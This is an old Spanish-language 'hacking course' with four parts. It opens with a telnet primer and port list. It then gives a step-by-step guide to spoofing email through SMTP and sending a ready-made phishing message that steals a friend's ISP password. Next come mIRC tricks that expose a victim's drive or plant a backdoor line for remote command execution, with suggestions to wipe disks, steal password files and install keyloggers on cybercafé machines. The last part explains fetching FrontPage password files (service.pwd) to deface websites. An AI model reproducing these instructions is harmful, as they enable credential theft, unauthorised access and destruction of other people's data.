Curso de Hacking

Bienvenidos nuevamente al curso de hacking de Softdownload, he estado ocupado haciendo este curso en el que tratare de ensearles lo que es telnet, irc, entre otras cosas. TELNET es el protocolo de "conexin" a otro ordenador, de hecho la mayoria de los servicios posteriores, se basan en telnet (pe. FTP, HTTP). Haciendo telnet a una mquina, ejecutas programas en ella, recibiendo tu la entrada/salida de los datos. Las direcciones TELNET suelen tener el formato del nombre de dominio "maquina.remota.ar" o de direccin IP "194.106.2.150" y pueden ir acompaadas de un nmero al final (el nmero del puerto) si no se nos proporciona el puerto se asume que el utilizado es el correspondiente al protocolo telnet por defecto, el 23. Una direccion tpica sera: "maquina.remota.ar 2010" Qu puedo hacer con TELNET ? Por telnet se pueden utilizar TODO tipo de servicios, haciendo telnet a la mquina y puerto correspondientes segun cada caso. Por ejemplo si queremos utilizar el servicio POP de nuestro ISP para ver el correo que tenemos, haremos telnet a la maquina POP por el puerto de este protocolo, el 110. Tambin podemos consultar grandes bases de datos e incluso acceder a servicios GHOPER o WWW, muy util si no tenemos acceso a estos servicios por la via normal. Cmo se hace TELNET ? Ejecutando un programa cliente de telnet, prcticamente cualquier sistema operativo lleva uno incluido de serie. Por lo tanto si nos proporcionan la direccin telnet "maquina.remota.ar 2010" hariamos lo siguiente: (puede variar segun sistemas): * Tecleamos en la linea de comandos "TELNET maquina.remota.ar 2010" (En otros sistemas teclearemos "TELNET" y despus "OPEN maquina.remota.ar 2010" ) con lo que veremos algo parecido a esto: * telnet MAQUINA.REMOTA.AR 2010 * Trying 130.132.21.53 Port 2010 ... * Connected to MAQUINA.REMOTA.AR * Escape character is ... * Esto nos dice ms o menos que est intentando conectar con la direccin, nos devuelve la direccin IP, se conecta, y nos dice cual es el "caracter escape". * Una vez hemos conectado se nos pide un "login" y/o "password" para entrar a la mquina remota. En algunos casos podremos conectar a la maquina remota con el login "guest" (invitado) pero la mayoria de las veces deberemos saber el login antes de conectarnos. * El siguiente paso es configurar la emulacin de terminal, es decir, decirle al sitio remoto como queremos que nos muestre los datos en nuestra pantalla. La configuracin ms comn es la VT100, que es la estandar para las comunicaciones basadas en terminales. (algunos clientes telnet configuran ellos slos la emulacin).

* El ltimo paso (despus de haber utilizado el servicio es salir ;-) Como las pulsaciones de tecla no las hacemos "realmente" en nuestra mquina, sino en la mquina remota, necesitamos el "caracter escape" que se nos di al conectar para pasar al "modo comando" ( habitualmente teclas control + parntesis derecho ). Comandos disponibles: CLOSE Termina la conexin TELNET con la maquina remota y vuelve al "modo comando" (si empezamos alli) o sale de TELNET. QUIT Sale del programa TELNET; si ests conectado a una mquina remota, QUIT te desconecta y luego sale de TELNET. SET ECHO Si no ves lo que ests escribiendo, o si escribes y ves doble, este comando soluciona el problema. OPEN Abre una conexin a una mquina remota. Nota: Al presionar las teclas Enter o Return, sales del modo comando TELNET y vuelves a la sesin TELNET. 4.10.4.- Lista de puertos ms comunes (resumida) : auth (113) conference (531) courier (530) daytime (13) discard (9) domain (53) echo (7) efs (520) exec (512) finger (79) ftp (21) gopher (70) hostnames (101) http (80) ingreslock (1524) link (87) login (513) mtp (57) nameserver (42) netbios (139) netnews (532) netstat (15) nntp (119) pop2 (109) pop3 (110) proxy (8080) qotd (17) remotefs (556) rje (77) sftp (115) shell (514) smtp (25) spooler (515) sunrpc (111) supdup (95)

systat (11) telnet (23) tempo (526) tftp (69) time (37) uucp (540) uucp-path (117) whois (43) www (80)

Como conseguir la contrasea de acceso a internet de tu amigo

Bien, as que queres ahorrarte algo guita y no pagar por un ISP? Entonces has venido al lugar indicado, pero, como ya te dije al principio, acordate que yo no me hago responsable de como utilices esta informacion. Bueno, vamos a lo interesante! 1- Ejecuta tu programa Telnet En Windows, Inicio, Ejecutar, Telnet. En Linux, primero tenes que abrir un shell, y escribir telnet 2- Despus conectate a algn servidor E-Mail anonimo, acordate de conectarte al puerto 25 En Windows "Conectar" En Linux Abrir 3- Ahora que estas conectado escribi lo siguiente: HELO [**algun servidor que se te ocurra**] mail from:[**Webmaster del ISP de tu amigo**] rcpt to:[**Direccin E-Mail de tu amigo**] data Estimado usuario de [**aqu va la compaia de tu amigo**], recientemente, nuestro servidor tuvo una falla con el archivo de registro de usuarios de internet y algunos problemas con la coneccin, lamentablemente el archivo de registro fue destruido pero, gracias a una copia de seguridad pudimos rescatar esta informacin, sin embargo esta copia de seguridad se creo cuando usted aun no haba solicitado nuestro servicio de internet, por lo que no aparece registrado en ella. Esto ocasionar que cada ves que se trate de conectar a nuestro servicio de internet, se le ira acumulando cierta cantidad de dinero puesto que no aparece en nuestros registros. Para corregir el problema, hemos creado un programa especial, todo lo que tiene que hacer, es enviar un E-Mail a: "[**El nombre del ISP de tu amigo**]@GalaxyCorp.com" y en Asunto introducir su "Nombre de usuario" y "Password" Gracias, tu provedor de Internet 4- Presiona enter dos veces, y despus escribi "." (sin las comillas) y presiona de nuevo enter. Despus solo teclea "quit", y listo. Bien, digamos que no entendiste por completo las cosas que vos tenes que cambiar, es decir, los lugares que estan resaltados y que tienen **, asi que dar una descripcin un poco mas detallada:

[**Webmaster del ISP de tu amigo**] - Por ejemplo, si tu amigo esta con aol.com, entonces escribes "webmaster@aol.com", correcto? [**Direccin E-Mail de tu amigo**] - Por ejemplo, si el E-Mail de tu amigo es "fred@aol.com", entonces escribes "fred@aol.com". [**aqu va la compaia de tu amigo**] - Si tu amigo esta con AOL (America Online), entonces escribes "America -Online" "[**El nombre del ISP de tu amigo**]@GalaxyCorp.com" - Esta es la parte dificil, pero no hay por que preocuparse: Abri tu navegador, y escribe "http://galaxycorp.com", consgui una cuenta. Cuando te pregunten por el nombre de usuario que te gustaria, trata de conseguir el mas cercano al nombre del ISP de tu amigo (por ejemplo, si tu amigo se conecta mediante America Online [AOL] entonces trata "aol" o "a_o_l" o "america_online"). Y cuando te pregunten por tu E-Mail, escribe el real. O consigue alguna otra cuanta de E-Mail gratuita, que parezca ser del ISP de tu amigo... Ahora continua con tu vida normal, y recuerda revisar tu E-Mail, si algn dia te llega un mensage de la direccin E-Mail de tu amigo, y en el asunto dice "fred f5r6e7d" entonces, podras ahorarte mas de $20 pesos por mes!

KOMO HURGAR EN ORDENADORES AJENOS A TRAVS DEL IRC

------------------------------------------------Bueno, pues ke yo sepa, he enkontrado 2 mtodos: * MTODO LAMER: --------------El primero, lo llamo mtodo lamer, porke es en el kual es necesario ke el otro usuario tenga los menores konocimientos posibles. Resumiendo, ke sea un inkompetente total!. Konsiste ni ms ni menos en una orden del mIRC: /fserve. Ahora si alguno no se ha bajado los doks sobre mIRC le tendra ke kastigar y todo eso... La orden fserve lo ke hace es ke nos ofrece una sesin de dcc get kon el usuario ke indikemos. Aunke ms bien es al kontrario, el usuario hurgar en nuestro HD. Enviamos ficheros por dcc, no?? Pues el fserve es ke el usuario se bajar lo ke kiera. Hasta puede subir y bajar de direktorio, borrar ficheros!, etc.... La orden en konkreto sera: /fserve nick 5 c: /fserve ==> La orden en si de mIRC nick ==> Aki debe ir vuestro nick (si keris hackear vosotros, aunke si ponis EMF, no me pienso kejar X) 5 ==> Es el nmero maximo de ficheros ke os podis bajar simultaneamente. Podis poner el nmero ke keris. c: ==> La unidad ke vais a mirar. Si es otra letra..... mal rollo. Este mtodo es el + lamer, ya ke es necesario: 1.- Ke el to no tenga ni pajolera idea de ke es un fserve. 2.- Ke el to no tenga ningn skript, ya ke normalmente suelen regular el fserve ellos solitos, kon lo ke si no ests autentifikado por el usuario tendras ke decirle ke te diera krditos en su fserve. (Siempre se puede praktikar la ingeniera social, pero..... en fin) 3.- Ke al to no se le okurra mirar esas ventanitas ke aparecen (NOTA: XDDDDDDDDDDDDDDDDDDDDDD) Vais a un kanal, por ejemplo #amor. Miris la lista de nicks y al ke os de la impresion de ser ms lamer le abrs un privado, dicindole ke no os funciona una kosa, ke pruebe a hacer la orden fserve y ya est!.

* METODO MENOS LAMER -------------------El mtodo menos lamer tambin es un pokillo lamer, pero es ms kachondo!. Consiste en una orden del mIRC, aunke ms ke una orden, es un komando remoto. Es este: ctcp 1:*:$1Este komando, introducido en los ctcps de mIRC, ejekuta kualkier orden de forma remota.Es komo el antiguo /ctpc nick DO. ctcp ==> Client-To-Client-Protocol. Los version, ping, etc... 1 ==> Nivel de usuario ke ejekuta el ctcp. * ==> Komo en DOS, komodn ke sustituye al ctcp ke nos hagan. Podramos definir aki un VERSION PING, etc.. $1- ==> Kon este parmetro, mIRC toma en konsideracin todo lo ke nos enven. Komo se usa?. Pos muy fcil. Yo he konseguido ke un lamer introduzka eso. Y de repente me apetece ke el lamer me de op, si la tiene, en el kanal #amor. No?. Pos si tiene hecho eso, est perdido.... jejejejeje. Tekleo "/ctcp LAMER mode #amor +o EMF". Sin las komillas!!!! De repente... Dios, tengo op en #amor! :) Pero de inmediato el lamer se enfada. No me dio op, aunke en el kanal pone ke s!!! :P Pos me apetece dejarlo a mal kon sus kolegas. Muahahahhhahahhahaaahaahah. Tekleo "/ctcp LAMER say Sois unos autntikos #@%%$$%$$!!!!" (NOTA: Censored!) Y me fijo en el kanal y... Oh, cielos!. De repente lamer ha dicho eso!! XD Pos hala por maledukado le mando esto "/ctcp LAMER quit Me han echado". Bueno, komo siempre debemos de tener kuidao, ya ke la ventanita se le llenar de mensajitos en rojo indikando nuestro nick. La sintaxis ya la habis visto, no?. Para enviar komandos es simple: /ctcp ==> Le indikamos a LAMER ke le va un CTCP. LAMER ==> El nick del user, en este kaso LAMER. A kontinuacin introducimos el komando ke keramos, kon sus parmetros y todas esas kosas, aunke SIN la barra de introduccin de komandos!!!. Aado, por cierto, ke si damos konseguido introducrselo al lamer, sera MUY interesante el ke nos diramos un nivel de usuario en el mIRC. Sino, korremos el riesgo de ke kualkiera se de kuenta de esto y nos chafe la diversin. Aunke tambin es un kante ke el lamer vea: 100:*!*@ctv666.ctv.es ==> por ejemplo. en su fichero de users de mIRC!. Eso s. Si aadimos eso, debemos de cambiar el remoto por: ctcp 100:*:$1Y as solamente usuarios de level 100 (=nosotrox) podremos ejekutar esto. Nada ms. Solamente indikaros ke el primer mtodo funciona.... Y si no komeros la kabeza!!!. No os voi a dar todo hecho :P El segundo mtodo EST KOMPROBADO. Vas a un ciberkafeto, donde los dueos no saben normalmente de la misa la mitad, y pegis eso en el .ini korrespondiente. Por cierto ke no son los nikos mtodos. Siempre hai kosas ke experimentar y hacer. Sino esto sera muy aburrido, no kreeis?? ;) Hai kosas ms interesantes ke se pueden hacer kon la segunda opcin, komo konfigurarle remotamente el autoexec.bat, formatearle el HD!, etc... O buskar archivos .pwl, instalar un keylog, etc... Eso ya keda de vuestra kuenta, de si sois hackers o crackers. Para hacer esto habra ke realizar un skript sino keremos pasarnos 2 horas tekleando komandos. Si me pega la lokura igual hago uno y lo subo a la pgina. :)

Bueno en este texto vamos a explicar un bug, que abunda en los NTs. El bug es algo simple, y solo tiene una condicin. La nica condicin es que la vctima tenga el Front Page Web Server, y el atacante el Front Page full ( el Expres no sirve ). Los pasos son muy simples. en el Front Page dirigirse a:

1ro.- File. 2do.- Open a Front Page Web... 3ro.- More Webs. 4to.- Ingresar el Url. 5to.- List Webs. Esto nos dar como resultado diferentes cosas, o nos da un error, o nos muestra en el espacio de abajo por ejemplo <ROOT> o el nombre que lleva la p gina... luego nos resta hacer doble click sobre el nombre de la p gina y listo. Claro que esto ultimo nos puede tirar diferentes resultados como por ejemplo. Errores, que nos pida pass y login o que directamente nos muestre el contenido de este. Si el ultimo es el caso, podremos hackear la page algo que para mi opinin no es un HACK MODELO.. pero bueno eso queda en cada uno. Si cuando vamos a intentar este bug en un server y nos encontramos con el login y el pass, hay formas de poder bajarnos el fichero donde se encuentran los mismos... esto seria de la siguiente forma. GET /_vti_pvt/service.pwd esto seria para obtener el fichero que contiene el login y el pass encriptados. ( .pwd, es la extensin de los ficheros que contiene los pass y logins del Front Page ). Despus de esta explicacin breve de este bug, hace falta mencionar que hay otras formas para conseguir el fichero de pass y login del Front Page, estas son como por ejemplo el del queryhits.htm, etc... pero creo que con lo que explique ser suficiente, en todo caso si quieren saciar su hambre por la informacin, pueden visitar las paginas de Rhino9 ( www.rhino9.ml.org ) o la de Technotronic ( www.technotronic.com ). " Algo que me parece importante agregar a este articulo, es que si lo que realmente quieren es hackear pages, que lo hagan con un propsito, no solo para decir "HACKED BY YO" y sin ningn significado... lo ideal seria poner un manifiesto, que ustedes crean sea adecuado y lo sientan. No poner algo por poner. "

Bueno espero que les haya gustado y esperen el proximo curso, en el que nos meteremos de nuevo en el mundo del hacking, y tal vez toquemos algo de phreacking (hablar por telefono gratarola). MartinC